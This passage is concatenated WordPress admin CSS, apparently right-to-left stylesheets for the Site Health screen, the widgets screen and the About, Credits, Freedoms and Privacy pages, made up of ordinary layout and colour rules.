url(site-icon-rtl.css); @import url(l10n-rtl.css); @import url(site-health-rtl.css); /* Note: Any Site Health selectors that use duplicate styling from the Privacy settings screen are styled in the Privacy section of edit.css */ .health-check-body h2 { line-height: 1.4; } .health-check-body h3 { padding: 0; font-weight: 400; } .site-health-progress-wrapper { margin-bottom: 1rem; } .site-health-progress { display: inline-block; height: 20px; width: 20px; margin: 0; border-radius: 100%; position: relative; font-weight: 600; font-size: 0.4rem; } .site-health-progress-count { position: absolute; display: block; height: 80px; width: 80px; left: 50%; top: 50%; margin-top: -40px; margin-left: -40px; border-radius: 100%; line-height: 6.3; font-size: 2em; } .loading .site-health-progress svg #bar { stroke-dashoffset: 0; stroke: #c3c4c7; animation: loadingPulse 3s infinite ease-in-out; } .site-health-progress svg circle { stroke-dashoffset: 0; transition: stroke-dashoffset 1s linear; stroke: #c3c4c7; stroke-width: 2em; } .site-health-progress svg #bar { stroke-dashoffset: 565; stroke: #d63638; } .green .site-health-progress #bar { stroke: #00a32a; } .green .site-health-progress .site-health-progress-label { color: #00a32a; } .orange .site-health-progress #bar { stroke: #dba617; } .orange .site-health-progress .site-health-progress-label { color: #dba617; } .site-health-progress-label { font-weight: 600; line-height: 20px; margin-left: 0.3rem; } @keyframes loadingPulse { 0% { stroke: #c3c4c7; } 50% { stroke: var(--wp-admin-theme-color); } 100% { stroke: #c3c4c7; } } .health-check-tabs-wrapper { /* IE 11 */ display: -ms-inline-grid; -ms-grid-columns: 1fr 1fr 1fr 1fr; vertical-align: top; /* modern browsers */ display: inline-grid; grid-template-columns: 1fr 1fr 1fr 1fr; } .health-check-tabs-wrapper.tab-count-1 { grid-template-columns: 1fr; } .health-check-tabs-wrapper.tab-count-2 { grid-template-columns: 1fr 1fr; } .health-check-tabs-wrapper.tab-count-3 { grid-template-columns: 1fr 1fr 1fr; } .health-check-tab { display: block; /* IE 11 */ text-decoration: none; color: inherit; padding: 0.5rem 1rem 1rem; margin: 0 1rem; transition: box-shadow 0.5s ease-in-out; } .health-check-offscreen-nav-wrapper { position: relative; background: transparent; border: none; } .health-check-offscreen-nav-wrapper:focus .health-check-offscreen-nav { left: initial; } .health-check-offscreen-nav { display: none; position: absolute; padding-top: 10px; right: 0; top: 100%; width: 13rem; } .health-check-offscreen-nav-wrapper.visible .health-check-offscreen-nav { display: inline-block; } .health-check-offscreen-nav:before { position: absolute; content: ""; width: 0; height: 0; border-style: solid; border-width: 0 10px 5px; border-color: transparent transparent #ffffff; right: 20px; top: 5px; } .health-check-offscreen-nav .health-check-tab { background: #fff; box-shadow: 0 2px 5px 0 rgba( 0, 0, 0, 0.75 ); } .health-check-offscreen-nav .health-check-tab.active { box-shadow: inset 3px 0 #3582c4; font-weight: 600; } .health-check-body { max-width: 800px; margin: 0 auto; } .widefat.health-check-table th { font-size: 13px; } .health-check-table td:first-child { width: 30%; } .health-check-table td { width: 70%; } .health-check-table ul, .health-check-table ol { margin: 0; } .health-check-body li { line-height: 1.5; } .health-check-body .pass::before, .health-check-body .good::before { content: "\f147"; content: "\f147" / ''; color: #00a32a; } .health-check-body .warning::before { content: "\f460"; content: "\f460" / ''; color: #dba617; } .health-check-body .info::before { content: "\f348"; content: "\f348" / ''; color: #72aee6; } .health-check-body .fail::before, .health-check-body .error::before { content: "\f335"; content: "\f335" / ''; color: #d63638; } .site-health-copy-buttons { margin: 1rem 0; } .site-health-copy-buttons .copy-button-wrapper { display: inline-flex; align-items: center; margin: 0.5rem 0 1rem; } .site-health-copy-buttons .success { color: #007017; margin-left: 0.5rem; } .site-status-has-issues.hide { display: none; } .site-health-view-more { text-align: center; } .site-health-issues-wrapper:first-of-type { margin-top: 3rem; } .site-health-issues-wrapper { margin-bottom: 3rem; margin-top: 2rem; } .site-status-all-clear { display: flex; flex-direction: column; align-items: center; justify-content: center; text-align: center; height: 100%; width: 100%; margin: 0 0 3rem; } @media all and (min-width: 784px) { .site-status-all-clear { margin: 2rem 0 5rem; } } .site-status-all-clear.hide { display: none; } .site-status-all-clear .dashicons { font-size: 150px; height: 150px; margin-bottom: 2rem; width: 150px; } .site-status-all-clear .encouragement { font-size: 1.5rem; font-weight: 600; } .site-status-all-clear p { margin: 0; } .wp-core-ui .button.site-health-view-passed { position: relative; padding-right: 40px; padding-left: 20px; } .health-check-wp-paths-sizes.spinner { visibility: visible; float: none; margin: 0 4px; flex-shrink: 0; } /* Styling unique to the dashboard widget. */ #dashboard_site_health .site-health-details { padding-left: 16px; } #dashboard_site_health .site-health-details p:first-child { margin-top: 0; } #dashboard_site_health .site-health-details p:last-child { margin-bottom: 0; } #dashboard_site_health .health-check-widget { display: grid; grid-template-columns: 1fr 2fr; grid-auto-rows: minmax(64px, auto); column-gap: 16px; align-items: center; } #dashboard_site_health .site-health-progress-label { margin-left: 0; } .health-check-widget-title-section { margin-bottom: 0; text-align: center; } @media screen and (max-width: 480px) { #dashboard_site_health .health-check-widget { grid-template-columns: 100%; } } @media screen and (max-width: 782px) { .site-health-issues-wrapper .health-check-accordion-trigger { flex-direction: column; align-items: flex-start; } .health-check-accordion-trigger .badge { margin: 1em 0 0; } .health-check-table { table-layout: fixed; } .health-check-table th, .health-check-table td { box-sizing: border-box; display: block; width: 100%; word-wrap: break-word; } .widefat.health-check-table th, .health-check-table td:first-child { width: 100%; padding-bottom: 0; font-weight: 600; } .wp-core-ui .site-health-copy-buttons .copy-button { margin-bottom: 0; } } /*! This file is auto-generated */ .widget{margin:0 auto 10px;position:relative;box-sizing:border-box}.widget.open{z-index:99}.widget.open:focus-within{z-index:100}.widget-top{font-size:13px;font-weight:600;background:#f6f7f7}.widget-top .widget-action{border:0;margin:0;padding:10px;background:0 0;cursor:pointer}.widget-title h3,.widget-title h4{margin:0;padding:15px;font-size:1em;line-height:1;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;-webkit-user-select:none;user-select:none}.widgets-holder-wrap .widget-inside{border-top:none;padding:1px 15px 15px;line-height:1.23076923}.widget.widget-dirty .widget-control-close-wrapper{display:none}#available-widgets .widget-description,#widgets-right a.widget-control-edit,.in-widget-title{color:#646970}.deleting .widget-title,.deleting .widget-top .widget-action .toggle-indicator:before{color:#a7aaad}.wp-core-ui .media-widget-control .selected,.wp-core-ui .media-widget-control.selected .not-selected,.wp-core-ui .media-widget-control.selected .placeholder{display:none}.media-widget-control.selected .selected{display:inline-block}.media-widget-buttons{text-align:right;margin-top:0}.media-widget-control .media-widget-buttons .button{width:auto;height:auto;margin-top:12px;white-space:normal}.media-widget-buttons .button:first-child{margin-left:8px}.media-widget-control .attachment-media-view .button-add-media,.media-widget-control .placeholder{border:1px dashed #c3c4c7;box-sizing:border-box;cursor:pointer;line-height:1.6;padding:9px 0;position:relative;text-align:center;width:100%}.media-widget-control .attachment-media-view .button-add-media{cursor:pointer;background-color:#f0f0f1;color:#2c3338}.media-widget-control .attachment-media-view .button-add-media:hover{background-color:#fff}.media-widget-control .attachment-media-view .button-add-media:focus{background-color:#fff;border-style:solid;border-color:#4f94d4;box-shadow:0 0 3px rgba(34,113,177,.8);outline:2px solid transparent;outline-offset:-2px}.media-widget-control .media-widget-preview{background:0 0;text-align:center}.media-widget-control .media-widget-preview .notice{text-align:initial}.media-frame .media-widget-embed-notice p code,.media-widget-control .notice p code{padding:0 0 0 3px}.media-frame .media-widget-embed-notice{margin-top:16px}.media-widget-control .media-widget-preview img{max-width:100%;vertical-align:middle;background-image:linear-gradient(-45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7),linear-gradient(-45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7);background-position:100% 0,10px 10px;background-size:20px 20px}.media-widget-control .media-widget-preview .wp-video-shortcode{background:#000}.media-frame.media-widget .media-toolbar-secondary{min-width:300px}.media-frame.media-widget .attachment-display-settings .setting.align,.media-frame.media-widget .checkbox-setting.autoplay,.media-frame.media-widget .embed-link-settings .setting.link-text,.media-frame.media-widget .embed-media-settings .legend-inline,.media-frame.media-widget .embed-media-settings .setting.align,.media-frame.media-widget .image-details .embed-media-settings .setting.align,.media-frame.media-widget .replace-attachment{display:none}.media-widget-video-preview{width:100%}.media-widget-video-link{display:inline-block;min-height:132px;width:100%;background:#000}.media-widget-video-link .dashicons{font:normal 60px/1 dashicons;position:relative;width:100%;top:-90px;color:#fff;text-decoration:none}.media-widget-video-link.no-poster .dashicons{top:30px}.media-frame #embed-url-field.invalid,.media-widget-image-link>.link:invalid{border:1px solid #d63638}.media-widget-image-link{margin:1em 0}.media-widget-gallery-preview{display:flex;justify-content:flex-start;flex-wrap:wrap;margin:-1.79104477%}.media-widget-preview.media_gallery,.media-widget-preview.media_image{cursor:pointer}.media-widget-preview .placeholder{background:#f0f0f1}.media-widget-gallery-preview .gallery-item{box-sizing:border-box;width:50%;margin:0;background:0 0}.media-widget-gallery-preview .gallery-item .gallery-icon{margin:4.5%}.media-widget-gallery-preview .gallery-item:nth-last-child(3):first-child,.media-widget-gallery-preview .gallery-item:nth-last-child(3):first-child~.gallery-item,.media-widget-gallery-preview .gallery-item:nth-last-child(n+5),.media-widget-gallery-preview .gallery-item:nth-last-child(n+5)~.gallery-item,.media-widget-gallery-preview .gallery-item:nth-last-child(n+6),.media-widget-gallery-preview .gallery-item:nth-last-child(n+6)~.gallery-item{max-width:33.33%}.media-widget-gallery-preview .gallery-item img{height:auto;vertical-align:bottom}.media-widget-gallery-preview .gallery-icon{position:relative}.media-widget-gallery-preview .gallery-icon-placeholder{position:absolute;top:0;bottom:0;width:100%;box-sizing:border-box;display:flex;align-items:center;justify-content:center;background-color:rgba(0,0,0,.5)}.media-widget-gallery-preview .gallery-icon-placeholder-text{font-weight:600;font-size:2em;color:#fff}.widget.ui-draggable-dragging{min-width:100%}.widget.ui-sortable-helper{opacity:.8}.widget-placeholder{border:1px dashed #c3c4c7;margin:0 auto 10px;height:45px;width:100%;box-sizing:border-box}#widgets-right .widget-placeholder{margin-top:0}#widgets-right .closed .widget-placeholder{height:0;border:0;margin-top:-10px}.sidebar-name{position:relative;box-sizing:border-box}.js .sidebar-name{cursor:pointer}.sidebar-name .handlediv{float:left;width:38px;height:38px;border:0;margin:0;padding:8px;background:0 0;cursor:pointer;outline:0}#widgets-right .sidebar-name .handlediv{margin:5px 0 0 3px}.sidebar-name .handlediv:focus{box-shadow:none;outline:1px solid transparent}#widgets-left .sidebar-name .toggle-indicator{display:none}#widgets-left .sidebar-name .handlediv:focus .toggle-indicator,#widgets-left .sidebar-name:hover .toggle-indicator,#widgets-left .widgets-holder-wrap.closed .sidebar-name .toggle-indicator{display:block}.sidebar-name .toggle-indicator:before{padding:1px 0 1px 2px;border-radius:50%}.sidebar-name .handlediv:focus .toggle-indicator:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.sidebar-name h2,.sidebar-name h3{margin:0;padding:8px 10px;overflow:hidden;white-space:normal;line-height:1.5}.widgets-holder-wrap .description{padding:0 0 15px;margin:0;font-style:normal;color:#646970}.inactive-sidebar .description,.widget-holder .description{color:#50575e}#widgets-right .widgets-holder-wrap .description{padding-right:7px;padding-left:7px}div.widget-liquid-left{margin:0;width:38%;float:right}div.widget-liquid-right{float:left;width:58%}div#widgets-left{padding-top:12px}div#widgets-left .closed .sidebar-name,div#widgets-left .inactive-sidebar.closed .sidebar-name{margin-bottom:10px}div#widgets-left .sidebar-name h2,div#widgets-left .sidebar-name h3{padding:10px 0;margin:0 0 0 10px}#widgets-left .widgets-holder-wrap,div#widgets-left .widget-holder{background:0 0;border:none}#widgets-left .widgets-holder-wrap{border:none;box-shadow:none}#available-widgets .widget{margin:0}#available-widgets .widget:nth-child(odd){clear:both}#available-widgets .widget .widget-description{display:block;padding:10px 15px;font-size:12px;overflow-wrap:break-word;word-wrap:break-word;-ms-word-break:break-all;word-break:break-word;hyphens:auto}#available-widgets #widget-list{position:relative}#widgets-left .inactive-sidebar{clear:both;width:100%;background:0 0;padding:0;margin:0 0 20px;border:none;box-shadow:none}#widgets-left .inactive-sidebar.first{margin-top:40px}div#widgets-left .inactive-sidebar .widget.expanded{right:auto}.widget-title-action{float:left;position:relative}div#widgets-left .inactive-sidebar .widgets-sortables{min-height:42px;padding:0;background:0 0;margin:0;position:relative}div#widgets-right .sidebars-column-1,div#widgets-right .sidebars-column-2{max-width:450px}div#widgets-right .widgets-holder-wrap{margin:10px 0 0}div#widgets-right .sidebar-description{min-height:20px;margin-top:-5px}div#widgets-right .sidebar-name h2,div#widgets-right .sidebar-name h3{padding:15px 7px 15px 15px}div#widgets-right .widget-top{padding:0}div#widgets-right .widgets-sortables{padding:0 8px;margin-bottom:9px;position:relative;min-height:123px}div#widgets-right .closed .widgets-sortables{min-height:0;margin-bottom:0}.remove-inactive-widgets .spinner,.sidebar-name .spinner{float:none;position:relative;top:-2px;margin:-5px 5px}.sidebar-name .spinner{position:absolute;top:18px;left:30px}#widgets-right .widgets-holder-wrap.widget-hover{border-color:#787c82;box-shadow:0 1px 2px rgba(0,0,0,.3)}.widget-access-link{float:left;margin:-5px 10px 10px 0}.widgets_access #widgets-left .widget .widget-top{cursor:auto}.widgets_access #wpwrap .widget-control-edit,.widgets_access #wpwrap .widgets-holder-wrap.closed .sidebar-description,.widgets_access #wpwrap .widgets-holder-wrap.closed .widget{display:block}.widgets_access #widgets-left .widget .widget-top:hover,.widgets_access #widgets-right .widget .widget-top:hover{border-color:#dcdcde}#available-widgets .widget-action .edit,#available-widgets .widget-control-edit .edit,#widgets-left .inactive-sidebar .widget-action .add,#widgets-left .inactive-sidebar .widget-control-edit .add,#widgets-right .widget-action .add,#widgets-right .widget-control-edit .add{display:none}.widget-control-edit{display:block;color:#646970;background:#f0f0f1;padding:0 15px;line-height:3.30769230;border-right:1px solid #dcdcde}#widgets-left .widget-control-edit:hover,#widgets-right .widget-control-edit:hover{color:#fff;background:#3c434a;border-right:0;outline:1px solid #3c434a}.widgets-holder-wrap .sidebar-description,.widgets-holder-wrap .sidebar-name{-webkit-user-select:none;user-select:none}.editwidget{margin:0 auto}.editwidget .widget-inside{display:block;padding:0 15px}.widget-control-actions{display:flex;align-items:center;justify-content:space-between}.editwidget .widget-control-actions{margin-top:20px}.js .closed br.clear,.js .widgets-holder-wrap.closed .description,.js .widgets-holder-wrap.closed .remove-inactive-widgets,.js .widgets-holder-wrap.closed .sidebar-description,.js .widgets-holder-wrap.closed .widget{display:none}.js .widgets-holder-wrap.closed .widget.ui-sortable-helper{display:block}.widget-description,.widget-inside{display:none}.widget-inside{background:#fff}.widget-inside select{max-width:100%}#removing-widget{display:none;font-weight:400;padding-right:15px;font-size:12px;line-height:1;color:#000}.js #removing-widget{color:#72aee6}#access-off,.no-js .widget-holder .description,.widget-control-noform,.widgets_access #access-on,.widgets_access .handlediv,.widgets_access .widget-action,.widgets_access .widget-holder .description{display:none}.widgets_access #widget-list,.widgets_access .widget-holder{padding-top:10px}.widgets_access #access-off{display:inline}.widgets_access .sidebar-name,.widgets_access .widget .widget-top{cursor:default}.widget-liquid-left #widgets-left.chooser #available-widgets .widget,.widget-liquid-left #widgets-left.chooser .inactive-sidebar{transition:opacity .1s linear}.widget-liquid-left #widgets-left.chooser #available-widgets .widget,.widget-liquid-left #widgets-left.chooser .inactive-sidebar{opacity:.2;pointer-events:none}.widget-liquid-left #widgets-left.chooser #available-widgets .widget-in-question{opacity:1;pointer-events:auto}#available-widgets .widget-top:hover,#widgets-left .widget-in-question .widget-top,#widgets-left .widget-top:hover,.widgets-chooser ul,div#widgets-right .widget-top:hover{border-color:#8c8f94;box-shadow:0 1px 2px rgba(0,0,0,.1)}.widgets-chooser ul.widgets-chooser-sidebars{margin:0;list-style-type:none;max-height:300px;overflow:auto}.widgets-chooser{display:none}.widgets-chooser ul{border:1px solid #c3c4c7}.widgets-chooser li{border-bottom:1px solid #c3c4c7;background:#fff;margin:0;position:relative}.widgets-chooser .widgets-chooser-button{width:100%;padding:10px 35px 10px 15px;background:0 0;border:0;box-sizing:border-box;text-align:right;cursor:pointer;transition:background .2s ease-in-out}.widgets-chooser .widgets-chooser-button:focus,.widgets-chooser .widgets-chooser-button:hover{outline:0;text-decoration:underline}.widgets-chooser li:last-child{border:none}.widgets-chooser .widgets-chooser-selected .widgets-chooser-button{background:var(--wp-admin-theme-color,#3858e9);color:#fff}.widgets-chooser .widgets-chooser-selected:before{content:"\f147";content:"\f147"/'';display:block;-webkit-font-smoothing:antialiased;font:normal 26px/1 dashicons;color:#fff;position:absolute;top:7px;right:5px}.widgets-chooser .widgets-chooser-actions{padding:10px 0 12px;text-align:center}#available-widgets .widget .widget-top{cursor:pointer}#available-widgets .widget.ui-draggable-dragging .widget-top{cursor:move}.text-widget-fields{position:relative}.text-widget-fields [hidden]{display:none}.text-widget-fields .wp-pointer.wp-pointer-top{position:absolute;z-index:3;top:100px;left:10px;right:10px}.text-widget-fields .wp-pointer .wp-pointer-arrow{right:auto;left:15px}.text-widget-fields .wp-pointer .wp-pointer-buttons{line-height:1.4}.custom-html-widget-fields>p>.CodeMirror{border:1px solid #dcdcde}.custom-html-widget-fields code{padding-top:1px;padding-bottom:1px}ul.CodeMirror-hints{z-index:101}.widget-control-actions .custom-html-widget-save-button.button.validation-blocked{cursor:not-allowed}@media screen and (max-width:782px){.editwidget .widget-inside input[type=checkbox],.editwidget .widget-inside input[type=radio],.widgets-holder-wrap .widget-inside input[type=checkbox],.widgets-holder-wrap .widget-inside input[type=radio]{margin:.25rem 0 .25rem .25rem}}@media screen and (max-width:480px){div.widget-liquid-left{width:100%;float:none;border-left:none;padding-left:0}#widgets-left .sidebar-name{margin-left:0}#widgets-left #available-widgets .widget-top{margin-left:0}#widgets-left .inactive-sidebar .widgets-sortables{margin-left:0}div.widget-liquid-right{width:100%;float:none}div.widget{max-width:480px}.widget-access-link{float:none;margin:15px 0 0}}@media screen and (max-width:320px){div.widget{max-width:320px}}@media only screen and (min-width:1250px){#widgets-left #available-widgets .widget{width:49%;float:right}.widget.ui-draggable-dragging{min-width:49%}#widgets-left #available-widgets .widget:nth-child(2n){float:left}#widgets-right .sidebars-column-1,#widgets-right .sidebars-column-2{float:right;width:49%}#widgets-right .sidebars-column-1{margin-left:2%}#widgets-right.single-sidebar .sidebars-column-1,#widgets-right.single-sidebar .sidebars-column-2{float:none;width:100%;margin:0}}/*! This file is auto-generated */ /*------------------------------------------------------------------------------ 22.0 - About Pages 1.0 Global: About, Credits, Freedoms, Privacy, Get Involved 1.1 Layout 1.2 Typography & Elements 1.3 Header 2.0 Credits Page 3.0 Freedoms Page 4.0 Privacy Page x.2.0 Legacy About Styles: Global x.2.1 Typography x.2.2 Structure x.2.3 Point Releases x.3.0 Legacy About Styles: About Page x.3.1 Typography x.3.2 Structure x.4.0 Legacy About Styles: Credits & Freedoms Pages x.5.0 Legacy About Styles: Media Queries ------------------------------------------------------------------------------*/ .about__container { /* Section backgrounds */ --background: #ebe8e5; --subtle-background: #ebe8e5; /* Main text color */ --text: #1e1e1e; --text-light: #fff; /* Accent colors: used in header, on special classes. */ --accent-1: #3858e9; /* Link color */ --accent-2: #183ad6; /* Accent background */ --accent-3: #ececec; /* hr background */ /* Header background on small screens */ --accent-gradient: linear-gradient(-90deg, #000000 4.7%, var(--accent-1) 83.84%)/*rtl:linear-gradient(-90deg, #000000 4.7%, var(--accent-1) 83.84%)*/; /* Navigation colors. */ --nav-background: #fff; --nav-border: transparent; --nav-color: var(--text); --nav-current: var(--accent-1); --border-radius: 0.5rem; --gap: 2rem; } /*------------------------------------------------------------------------------ 1.0 - Global: About, Credits, Freedoms, Privacy, Get Involved ------------------------------------------------------------------------------*/ .about-php, .credits-php, .freedoms-php, .privacy-php, .contribute-php { background: #fff; } .about-php #wpcontent, .credits-php #wpcontent, .freedoms-php #wpcontent, .privacy-php #wpcontent, .contribute-php #wpcontent { background: #fff; padding: 0 24px; } @media screen and (max-width: 782px) { .about-php.auto-fold #wpcontent, .credits-php.auto-fold #wpcontent, .freedoms-php.auto-fold #wpcontent, .privacy-php.auto-fold #wpcontent, .contribute-php.auto-fold #wpcontent { padding-right: 24px; } } .about__container { max-width: 1000px; margin: 24px auto; clear: both; } .about__container .alignleft { float: right; } .about__container .alignright { float: left; } .about__container .aligncenter { text-align: center; } .about__container .is-vertically-aligned-top { align-self: start; } .about__container .is-vertically-aligned-center { align-self: center; } .about__container .is-vertically-aligned-bottom { align-self: end; } .about__section { background: transparent; clear: both; } .about__container .has-accent-background-color { color: var(--text-light); background-color: var(--accent-2); } .about__container .has-transparent-background-color { background-color: transparent; } .about__container .has-accent-color { color: var(--accent-2); } .about__container .has-border { border: 3px solid currentColor; } .about__container .has-subtle-background-color { background-color: var(--subtle-background); border-radius: var(--border-radius); } .about__container .has-background-image { background-size: contain; background-repeat: no-repeat; background-position: center; } /* 1.1 - Layout */ .about__section { margin: 0; } .about__section .column:not(.is-edge-to-edge) { padding: var(--gap); } .about__section .column.is-left-padding-zero { padding-right: 0; } .about__section .column.is-right-padding-zero { padding-left: 0; } .about__section + .about__section .is-section-header { padding-bottom: var(--gap); } .about__section .column[class*="background-color"]:not(.is-edge-to-edge), .about__section:where([class*="background-color"]) .column:not(.is-edge-to-edge), .about__section .column.has-border:not(.is-edge-to-edge) { padding-top: var(--gap); padding-bottom: var(--gap); } .about__section .column p:first-of-type { margin-top: 0; } .about__section .column p:last-of-type { margin-bottom: 0; } .about__section .has-text-columns { columns: 2; column-gap: calc(var(--gap) * 2); } .about__section .is-section-header { margin-bottom: 0; padding: var(--gap) var(--gap) 0; } .about__section .is-section-header p:last-child { margin-bottom: 0; } /* Section header is alone in a container. */ .about__section .is-section-header:first-child:last-child { padding: 0; } .about__section.is-feature { padding: var(--gap); } .about__section.is-feature p { margin: 0; } .about__section.is-feature p + p { margin-top: calc(var(--gap) / 2); } .about__section.has-1-column { margin-right: auto; margin-left: auto; max-width: 36em; } .about__section.has-2-columns, .about__section.has-3-columns, .about__section.has-4-columns, .about__section.has-overlap-style { display: grid; } .about__section.has-gutters { gap: var(--gap); margin-bottom: var(--gap); } .about__section.has-2-columns { grid-template-columns: 1fr 1fr; } .about__section.has-2-columns.is-wider-right { grid-template-columns: 2fr 3fr; } .about__section.has-2-columns.is-wider-left { grid-template-columns: 3fr 2fr; } .about__section .is-section-header { grid-column-start: 1; grid-column-end: -1; } .about__section.has-3-columns { grid-template-columns: repeat(3, 1fr); } .about__section.has-4-columns { grid-template-columns: repeat(4, 1fr); } .about__section.has-overlap-style { grid-template-columns: repeat(7, 1fr); } .about__section.has-overlap-style .column { grid-row-start: 1; } .about__section.has-overlap-style .column:nth-of-type(2n+1) { grid-column-start: 2; grid-column-end: span 3; } .about__section.has-overlap-style .column:nth-of-type(2n) { grid-column-start: 4; grid-column-end: span 3; } .about__section.has-overlap-style .column.is-top-layer { z-index: 1; } @media screen and (max-width: 782px) { .about__section.has-2-columns.is-wider-right, .about__section.has-2-columns.is-wider-left, .about__section.has-3-columns { display: block; margin-bottom: calc(var(--gap) / 2); } .about__section .column:not(.is-edge-to-edge) { padding-top: var(--gap); padding-bottom: var(--gap); } .about__section.has-2-columns.has-gutters.is-wider-right, .about__section.has-2-columns.has-gutters.is-wider-left, .about__section.has-3-columns.has-gutters { margin-bottom: calc(var(--gap) * 2); } .about__section.has-2-columns.has-gutters .column, .about__section.has-2-columns.has-gutters .column, .about__section.has-3-columns.has-gutters .column { margin-bottom: var(--gap); } .about__section.has-2-columns.has-gutters .column:last-child, .about__section.has-2-columns.has-gutters .column:last-child, .about__section.has-3-columns.has-gutters .column:last-child { margin-bottom: 0; } .about__section.has-3-columns .column:nth-of-type(n) { padding-top: calc(var(--gap) / 2); padding-bottom: calc(var(--gap) / 2); } .about__section.has-4-columns { grid-template-columns: repeat(2, 1fr); } .about__section.has-overlap-style { grid-template-columns: 1fr; } /* At this size, the two columns fully overlap */ .about__section.has-overlap-style .column.column { grid-column-start: 1; grid-column-end: 2; grid-row-start: 1; grid-row-end: 2; } } @media screen and (max-width: 600px) { .about__section.has-2-columns { display: block; margin-bottom: var(--gap); } .about__section.has-2-columns:not(.has-gutters) .column:nth-of-type(n) { padding-top: calc(var(--gap) / 2); padding-bottom: calc(var(--gap) / 2); } .about__section.has-2-columns.has-gutters { margin-bottom: calc(var(--gap) * 2); } .about__section.has-2-columns.has-gutters .column { margin-bottom: var(--gap); } .about__section.has-2-columns.has-gutters .column:last-child { margin-bottom: 0; } .about__section .column.is-left-padding-zero { padding-left: 0; } .about__section .column.is-right-padding-zero { padding-right: 0; } } @media screen and (max-width: 480px) { .about__section.is-feature .column, .about__section .is-section-header { padding: 0; } .about__section.has-4-columns { display: block; padding-bottom: calc(var(--gap) / 2); } .about__section.has-4-columns.has-gutters .column { margin-bottom: calc(var(--gap) / 2); } .about__section.has-4-columns.has-gutters .column:last-child { margin-bottom: 0; } .about__section.has-4-columns .column:nth-of-type(n) { padding-top: calc(var(--gap) / 2); padding-bottom: calc(var(--gap) / 2); } } /* 1.2 - Typography & Elements */ .about__container { line-height: 1.4; color: var(--text); } .about__container h1 { padding: 0; } .about__container h1, .about__container h2, .about__container h3.is-larger-heading { margin-top: 0; margin-bottom: calc(0.5 * var(--gap)); font-size: 2rem; font-weight: 700; line-height: 1.16; } .about__container h3, .about__container h1.is-smaller-heading, .about__container h2.is-smaller-heading { margin-top: 0; margin-bottom: calc(0.5 * var(--gap)); font-size: 1.625rem; font-weight: 700; line-height: 1.4; } .about__container h4, .about__container h3.is-smaller-heading { margin-top: 0; font-size: 1.125rem; font-weight: 600; line-height: 1.6; } .about__container h1, .about__container h2, .about__container h3, .about__container h4 { text-wrap: pretty; color: inherit; } .about__container :is(h1, h2, h3, h4, .about__header-text):lang(en) { text-wrap: balance; } .about__container p { text-wrap: pretty; } .about__container p { font-size: inherit; line-height: inherit; } .about__container p.is-subheading { margin-top: 0; margin-bottom: 1rem; font-size: 1.5rem; font-weight: 300; line-height: 160%; } .about__section a { color: var(--accent-1); text-decoration: underline; } .about__section a:hover, .about__section a:active, .about__section a:focus { color: var(--accent-1); text-decoration: none; } .wp-credits-list a { text-decoration: none; } .wp-credits-list a:hover, .wp-credits-list a:active, .wp-credits-list a:focus { text-decoration: underline; } .about__section a.button.button-hero { padding-top: 1.1875rem; padding-bottom: 1.1875rem; font-size: 1.5rem; line-height: 1.4; white-space: normal; text-wrap: pretty; } .about__container ul { list-style: disc; margin-right: calc(var(--gap) / 2); } .about__container li { margin-bottom: 0.5rem; } .about__container img { margin: 0; max-width: 100%; vertical-align: middle; } .about__container .about__image { margin: 0; } .about__container .about__image img { max-width: 100%; width: 100%; height: auto; border-radius: var(--border-radius); } .about__container .about__image figcaption { margin-top: 0.5em; text-align: center; } .about__container .about__image .wp-video { margin-right: auto; margin-left: auto; } .about__container .about__image svg { vertical-align: middle; } .about__container .about__image + h3 { margin-top: calc(0.75 * var(--gap)); } .about__container hr { margin: calc(var(--gap) / 2) var(--gap); height: 0; border: none; border-top: 4px solid var(--accent-3); } .about__container hr.is-small { margin-top: 0; margin-bottom: 0; } .about__container hr.is-large { margin: var(--gap) auto; } .about__container hr.is-invisible { border: none; } .about__container div.updated, .about__container div.error, .about__container .notice { display: none !important; } .about__container code { font-size: inherit; } .about__section { font-size: 1.125rem; line-height: 1.55; } .about__section.is-feature { font-size: 1.6em; } .about__section.has-3-columns, .about__section.has-4-columns { font-size: 1rem; } @media screen and (max-width: 480px) { .about__section.is-feature { font-size: 1.4em; } .about__container h1, .about__container h2, .about__container h3.is-larger-heading { font-size: 2em; } } /* 1.3 - Header */ .about__header { position: relative; display: flex; flex-direction: column; align-items: flex-start; justify-content: flex-end; box-sizing: border-box; padding: calc(var(--gap) * 1.5); padding-left: 26rem; /* Space for the background image. */ min-height: clamp(10rem, 25vw, 18.75rem); border-radius: var(--border-radius); background-image: url( "../images/about-header-default.webp?ver=20260514" ); background-repeat: no-repeat; background-position: left center; background-size: cover; background-color: var(--background); color: var(--text-light); } .credits-php .about__header { background-image: url( "../images/about-header-credits.webp?ver=20260514" ); } .freedoms-php .about__header { background-image: url( "../images/about-header-freedoms.webp?ver=20260514" ); } .privacy-php .about__header { background-image: url( "../images/about-header-privacy.webp?ver=20260514" ); } .contribute-php .about__header { background-image: url( "../images/about-header-get-involved.webp?ver=20260514" ); } [dir="rtl"] .about__header { background-image: url( "../images/about-header-default-rtl.webp?ver=20260514" ); } [dir="rtl"] .credits-php .about__header { background-image: url( "../images/about-header-credits-rtl.webp?ver=20260514" ); } [dir="rtl"] .freedoms-php .about__header { background-image: url( "../images/about-header-freedoms-rtl.webp?ver=20260514" ); } [dir="rtl"] .privacy-php .about__header { background-image: url( "../images/about-header-privacy-rtl.webp?ver=20260514" ); } [dir="rtl"] .contribute-php .about__header { background-image: url( "../images/about-header-get-involved-rtl.webp?ver=20260514" ); } .about__header-image { margin: 0 0 calc(var(--gap) * 1.5); } .about__header-title { box-sizing: border-box; margin: 0; padding: 0; } .about__header-title h1 { margin: 0; padding: 0; /* Fluid font size scales on browser size 960px - 1200px. */ font-size: clamp(2rem, 20vw - 9rem, 4rem); line-height: 1; font-weight: 600; color: var(--text); } .about-php .about__header-title h1, .credits-php .about__header-title h1, .freedoms-php .about__header-title h1, .privacy-php .about__header-title h1, .contribute-php .about__header-title h1 { /* Fluid font size scales on browser size 960px - 1200px. */ font-size: clamp(2rem, 20vw - 9rem, 4rem); } .about__header-text { box-sizing: border-box; max-width: 26em; margin: 1rem 0 0; padding: 0; font-size: 1.6rem; line-height: 1.15; color: var(--text); } .about__header-navigation { position: relative; z-index: 1; display: flex; flex-wrap: wrap; justify-content: space-between; padding-top: 0; margin-bottom: 